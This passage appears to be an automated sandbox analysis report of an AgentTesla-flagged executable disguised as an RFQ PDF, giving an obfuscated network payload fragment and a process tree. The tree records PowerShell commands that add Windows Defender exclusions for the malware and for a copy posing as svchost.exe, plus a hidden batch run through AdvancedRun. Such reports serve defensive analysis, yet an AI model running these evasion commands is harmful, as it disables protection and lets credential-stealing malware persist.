                                                                                                                                        Data Raw: 35 30 63 31 0d 0a 3c 70 3e 58 69 59 62 59 63 62 56 59 62 59 63 63 43 59 62 59 63 63 62 59 62 59 63 63 43 59 62 59 49 49 59 62 59 63 63 62 59 62 59 63 62 54 59 62 59 63 63 43 59 62 59 63 56 63 59 62 59 63 63 43 59 62 59 63 62 4a 59 62 59 63 62 4a 59 62 59 63 62 75 59 62 59 63 62 43 59 62 59 58 69 59 62 59 63 62 63 59 62 59 58 69 59 62 59 63 63 62 59 62 59 63 63 75 59 62 59 63 63 69 59 62 59 63 63 56 59 62 59 63 63 75 59 62 59 63 62 63 59 62 59 63 63 49 59 62 59 63 63 54 59 62 59 58 69 59 62 59 63 63 75 59 62 59 58 69 59 62 59 63 62 49 59 62 59 63 63 62 59 62 59 63 63 75 59 62 59 49 43 59 62 59 63 62 4a 59 62 59 63 62 58 59 62 59 63 56 62 59 62 59 63 62 49 59 62 59 63 56 63 59 62 59 63 56 56 59 62 59 63 62 56 59 62 59 63 62 69 59 62 59 63 56 56 59 62 59 58 69 59 62 59 63 63 43 59 62 59 58 69 59 62 59 49 43 59 62 59 49 49 59 62 59 63 62 63 59 62 59 63 62 4a 59 62 59 49 69 59 62 59 63 62 62 59 62 59 63 63 69 59 62 59 63 63 54 59 62 59 63 62 54 59 62 59 63 62 49 59 62 59 63 63 69 59 62 59 63 63 4a 59 62 59 58 69 59 62 59 63 62 4a 59 62 59 58 69 59 62 59 63 63 56 59 62 59 63 63 75 59 62 59 63 63 54 59 62 59 63 63 63 59 62 59 63 62 63 59 62 59 63 63 56 59 62 59 63 62 75 59 62 59 63 62 54 59 62 59 49 69 59 62 59 63 63 4a 59 62 59 63 62 75 59 62 59 58 69 59 62 59 49 49 59 62 59 58 69 59 62 59 63 56 63 59 62 59 63 56 63 59 62 59 49 49 59 62 59 63 63 43 59 62 59 63 62 63
                                                                                                                                        Data Ascii: 50c1<p>XiYbYcbVYbYccCYbYccbYbYccCYbYIIYbYccbYbYcbTYbYccCYbYcVcYbYccCYbYcbJYbYcbJYbYcbuYbYcbCYbYXiYbYcbcYbYXiYbYccbYbYccuYbYcciYbYccVYbYccuYbYcbcYbYccIYbYccTYbYXiYbYccuYbYXiYbYcbIYbYccbYbYccuYbYICYbYcbJYbYcbXYbYcVbYbYcbIYbYcVcYbYcVVYbYcbVYbYcbiYbYcVVYbYXiYbYccCYbYXiYbYICYbYIIYbYcbcYbYcbJYbYIiYbYcbbYbYcciYbYccTYbYcbTYbYcbIYbYcciYbYccJYbYXiYbYcbJYbYXiYbYccVYbYccuYbYccTYbYcccYbYcbcYbYccVYbYcbuYbYcbTYbYIiYbYccJYbYcbuYbYXiYbYIIYbYXiYbYcVcYbYcVcYbYIIYbYccCYbYcbc


                                                                                                                                        Code Manipulations

                                                                                                                                        Statistics

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        Analysis Process: RFQ - REF 208056-pdf.exe PID: 6556 Parent PID: 5784

                                                                                                                                        General

                                                                                                                                        Start time:15:14:50
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe'
                                                                                                                                        Imagebase:0x50000
                                                                                                                                        File size:117936 bytes
                                                                                                                                        MD5 hash:C1B250F45DE606EF95AF9961496402A0
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low

                                                                                                                                        Analysis Process: svchost.exe PID: 6788 Parent PID: 560

                                                                                                                                        General

                                                                                                                                        Start time:15:15:04
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                        Imagebase:0x7ff641cd0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: svchost.exe PID: 7040 Parent PID: 560

                                                                                                                                        General

                                                                                                                                        Start time:15:15:14
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                        Imagebase:0x7ff641cd0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: svchost.exe PID: 7108 Parent PID: 560

                                                                                                                                        General

                                                                                                                                        Start time:15:15:15
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                        Imagebase:0x7ff641cd0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: svchost.exe PID: 7156 Parent PID: 560

                                                                                                                                        General

                                                                                                                                        Start time:15:15:16
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                        Imagebase:0x7ff641cd0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: svchost.exe PID: 6064 Parent PID: 560

                                                                                                                                        General

                                                                                                                                        Start time:15:15:18
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                        Imagebase:0x7ff641cd0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: powershell.exe PID: 5688 Parent PID: 6556

                                                                                                                                        General

                                                                                                                                        Start time:15:15:27
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
                                                                                                                                        Imagebase:0xec0000
                                                                                                                                        File size:430592 bytes
                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: conhost.exe PID: 2720 Parent PID: 5688

                                                                                                                                        General

                                                                                                                                        Start time:15:15:28
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff774ee0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: AdvancedRun.exe PID: 5504 Parent PID: 6556

                                                                                                                                        General

                                                                                                                                        Start time:15:15:28
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:91000 bytes
                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                        Reputation:moderate

                                                                                                                                        Analysis Process: AdvancedRun.exe PID: 5716 Parent PID: 5504

                                                                                                                                        General

                                                                                                                                        Start time:15:15:37
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:91000 bytes
                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate

                                                                                                                                        Analysis Process: explorer.exe PID: 2084 Parent PID: 3292

                                                                                                                                        General

                                                                                                                                        Start time:15:15:40
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
                                                                                                                                        Imagebase:0x7ff662bf0000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: explorer.exe PID: 6816 Parent PID: 792

                                                                                                                                        General

                                                                                                                                        Start time:15:15:42
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                        Imagebase:0x7ff662bf0000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: svchost.exe PID: 1020 Parent PID: 6816

                                                                                                                                        General

                                                                                                                                        Start time:15:15:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
                                                                                                                                        Imagebase:0xd60000
                                                                                                                                        File size:117936 bytes
                                                                                                                                        MD5 hash:C1B250F45DE606EF95AF9961496402A0
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 32%, ReversingLabs
                                                                                                                                        Reputation:low

                                                                                                                                        Analysis Process: powershell.exe PID: 6736 Parent PID: 6556

                                                                                                                                        General

                                                                                                                                        Start time:15:15:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
                                                                                                                                        Imagebase:0xec0000
                                                                                                                                        File size:430592 bytes
                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: conhost.exe PID: 6440 Parent PID: 6736

                                                                                                                                        General

                                                                                                                                        Start time:15:15:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff774ee0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: cmd.exe PID: 1044 Parent PID: 6556

                                                                                                                                        General

                                                                                                                                        Start time:15:15:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                                                        Imagebase:0x1020000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Analysis Process: conhost.exe PID: 6216 Parent PID: 1044

                                                                                                                                        General

                                                                                                                                        Start time:15:15:46
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff774ee0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Analysis Process: timeout.exe PID: 6220 Parent PID: 1044

                                                                                                                                        General

                                                                                                                                        Start time:15:15:46
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:timeout 1
                                                                                                                                        Imagebase:0x10e0000
                                                                                                                                        File size:26112 bytes
                                                                                                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Disassembly

                                                                                                                                        Code Analysis

                                                                                                                                        Reset < >